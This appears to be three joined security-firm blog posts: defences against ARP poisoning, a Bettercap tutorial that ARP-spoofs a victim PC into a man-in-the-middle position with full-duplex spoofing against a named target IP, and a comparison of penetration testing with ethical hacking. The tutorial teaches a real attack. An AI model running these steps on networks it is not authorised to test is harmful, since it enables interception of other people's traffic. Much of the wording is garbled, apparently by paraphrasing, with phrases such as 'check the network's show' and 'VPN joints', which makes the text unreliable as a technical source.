You can use different ways to limit ARP poisoning, each with its own positives and negatives. These add static ARP entries, encryption, VPNs and packet sniffing.

Static ARP entries

This answer requires a lot of organizational overhead and is only suggested for shorter networks. It requires adding an ARP entry for every device on a network into each personal computer.

Mapping the devices with sets of static IP and MAC addresses serves to block spoofing attacks because the devices can neglect ARP replies. Sadly, this solution can only shield you from simpler attacks.

Encryption

Protocols such as HTTPS and SSH can also serve to decrease the chances of a strong ARP poisoning attack. When traffic is encrypted, the attacker would have to go to the extra step of deceiving the target’s browser into taking an illegitimate certificate. However, any data forwarded outside of these protocols will still be exposed.

VPNs

VPNs can be a sound defence for individuals, but they are usually not proper for larger groups. If it is just a particular person making a possibly dangerous association, such as using public wifi at an airport, then a VPN will encrypt all of the data that goes between the client and the exit server. This serves to keep them safe because an enemy will only be prepared to see the ciphertext.

It’s a less-feasible answer at the organizational level because VPN joints would want to be in place within each computer and each server. Not only would this be difficult to set up and support, but encrypting and decrypting on that scale would also check the network’s show.

Packet filters

These filters examine each packet that orders sent across a network. They can filter out and block malicious packets, as well as those whose IP addresses are different. Packet filters can also tell if a packet claims to come from an inside network when it actually originates externally, helping to decrease the possibilities of an attack being victorious.

How to protect the network from ARP spoofing?

If you need your network to be protected from the intimidation of ARP poisoning, the best plan is a sequence of the above-mentioned prevention and discovery tools. The overriding methods tend to have flaws in certain circumstances, so even the most protected environment may find itself under attack.

If active exposure tools are in place as well, then you will know about ARP poisoning as soon as it works. As long as your network controller is quick to act once informed, you can usually shut down these attacks before much damage is done.

If you have any doubts about this topic or have to get advice and get the best services and consultation against ARP spoofing. Feel free to contact us. AIRZERO SEC will be your strong digital solution. Email id: [email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

What is Man In The Middle Attack(MITM)?

A man-in-the-middle attack is an attack where the attacker privately relays and possibly makes changes to the communications between two machines who believe that they are directly connected with each other. In order to act a man-in-a-middle attack, we are required to be in the same network as our victim because we have to fool these two machines.

How to initiate the attack by running Bettercap?

To know which network interface is used we can easily type ifconfig.

In this case, it is wlan0, so just type bettercap -iface wlan0 and press enter.

As you can see now we are already inside the tool, but it’s just a blank space without any details. In order to make our work easier, we can type help and then press enter here is what it shows us.

Now we have some details about this, but our concern here is the module. For more details, we can type help followed by module’s name for example help net. Probe.

So, this module consists of various parameters, but for now, let's just keep it default and turn on the module by typing net. probe on.

Now the module is already executing, what actually happens is the module is scanning all the machines connected to the same network as our pc, including its IP address, mac address and vendor’s name. To make things clearer we can type net. show for further details.

So, Raspberry Pi is the machine used to perform this attack and my IP address is 192.168.1.4. The router IP address is 192.168.1.1 knew it by the Name column that shows the gateway and the rest is the client communicated to this network. Now we can choose an option which one to be our victim.

Just like the previous module, it’s consists of various parameters. First, let’s take a look at arp. spoof.full-duplex parameter. In order to be the man in the middle, we need to fool both the victim and the router by telling the router that the victim’s mac address is our mac address and telling the victim that the router’s mac address is our mac address. So we need to set this parameter to true by typing set arp. spoof.full-duplex true. Secondly, we need to set arp. spoof.targets parameter by simply giving it the IP address of our victim. So in my case, it will be set arp. Spoof. targets 192.168.1.3.

After setting up these 2 parameters we are ready to fire up this module by typing arp. spoof on. But wait a second let us go to windows 10 and type arp -a.

Like we already know when we enter the net. show command that my router IP’s is 192.168.1.1 and its mac is e4:::::e4 which is the real one. So worst things have not happened. Let’s go back to raspberry pi and fire up arp. spoof by typing arp. spoof on.

Now we are already in the middle of the victim which is windows 10 and my router. To make sure let’s open up cmd on windows 10 and type arp -a. Press type and then I’m gonna move to windows 10. Nothing is worst on the browser everything is just fine. Yeah! we know that our victim is accessing vulnweb.com.

If you have any doubts about this topic or have to get advice and get the best cybersecurity services and consultation about man-in-the-middle- attack. Feel free to contact us. AIR ZERO SEC will be your strong digital solution. Email id: [email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

What is penetration testing?

Penetration testing is the formal process of assessing the maturity and power of the safety systems in place. Regular penetration testing helps businesses to find emerging security threats and vulnerabilities, gain critical insights into the exploitability of security vulnerabilities, and assess the security problems facing them.

By mimicking real-life attack cases under safe conditions, web application penetration testing, and other types of pen-testing are helpful, not dangerous processes. Pen-testing empowers businesses to get the first-mover advantage in terms of safety.

Conducted by trustworthy and certified safety experts, pen-testing is a very planned process. It is done after obtaining all necessary permissions from the business and without interrupting the common flow of work.

What is ethical hacking?

Ethical hacking is a wide, umbrella term that includes all hacking and cyberattack methodologies and . These are longer-term assessments conducted by the ethical hacker with the necessary permissions to explore the IT architecture more broadly. Ethical hacking helps unearth safety vulnerabilities and flaws by intruding the system using a wide range of attack vectors and attack kinds. The professionals conducting ethical hacking must be differentiated from black-hat hackers who have malicious plans. Ethical hackers, with their understanding of the system, will not just locate weaknesses, but also research and suggest security-related methodologies to implement.

What is the difference between ethical hacking and penetration testing?

  • Purpose
    Penetration testing seeks to find security weaknesses in the targeted system. It is usually not conducted on the entire infrastructure. It seeks to tell the company how its security systems respond to real-time attacks and suggest measures to strengthen the same. Ethical hacking seeks to find as many security flaws as possible in the Information technology environment using wide-ranging plans and attack vectors. It seeks to give a holistic evaluation of cybersecurity. More problem solvers and risk mitigation assistance are provided by ethical hackers in comparison to penetration testers who submit a report with suggestions on the finishing of the testing.
  • Scope
    Given that budgetary penetration testing is often used on specific parts of the IT system defined for testing, not the complete environment. The assessment provided by penetration testing is targeted and point-in-time. As a result, safety flaws and weaknesses are identified only in the aimed systems at a given point in time. Ethical hacking has a wider scope and assesses the IT environment holistically over longer periods of a clock. So, there is scope to find as many safety flaws and weaknesses as possible in the environment. Penetration testing is a function of ethical hacking.
  • Permissions Required
    Since web application penetration testing and other types of pen-testing are aimed, the testers require access and permissions only for those targeted areas they are testing. While in ethical hacking, the tester needs access and permissions to a whole range of systems and locations, based on the defined scope.

Who Conducts penetration testing and ethical hacking?

This is one of the important points of difference between penetration testing and ethical hacking.

  • Penetration testing can be done by someone with knowledge and expertise in the specific side of testing. Ethical hackers must have knowledge of software, programming plans and hardware to be effective.
  • Knowledge of hack methodologies in the aimed areas is adequate for penetration testers while ethical hackers must have a wider knowledge of attack methodologies and attack vectors.
  • While informatics reporting is necessary for penetration testing, ethical hackers must be experts in report writing and be able to produce in-depth reports with recommended solutions.
  • Ethical hackers must be clarified. Even though it is recommended to have certification, it is not that important for penetration testers if they have enough experience.
  • It is trusted that the perfect penetration testers have ethical hacking knowledge as it better equips them to conduct effective tests and produce detailed reports and actionable insights.

Ethical hacking or Penetration testing which is the best?

Overall, Penetration Testing can be argued to be a subset of ethical hacking. Ethical hacking in its edge point can be a process to hack the system just like a hacker will do, but with complete permission from the business and stakeholders to do so.

A Penetration testing focus is on identifying problems. An ethical hacking aim is not just on identifying risk but to show and demonstrate exploitation.

Not all organizations can set up systems where exploitation can be done and hence a Penetration testing and getting a view and an understanding of the exploitable risks without the destruction carried out is an effective way to get visibility and fix them.

If you have any doubts about this topic or have to get services and get the best penetration testing and ethical hacking services. Feel free to contact us. AIRZERO SEC will be your digital partner. Email id: [email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile:
www.linkedin.com/in/johnsontaugustine/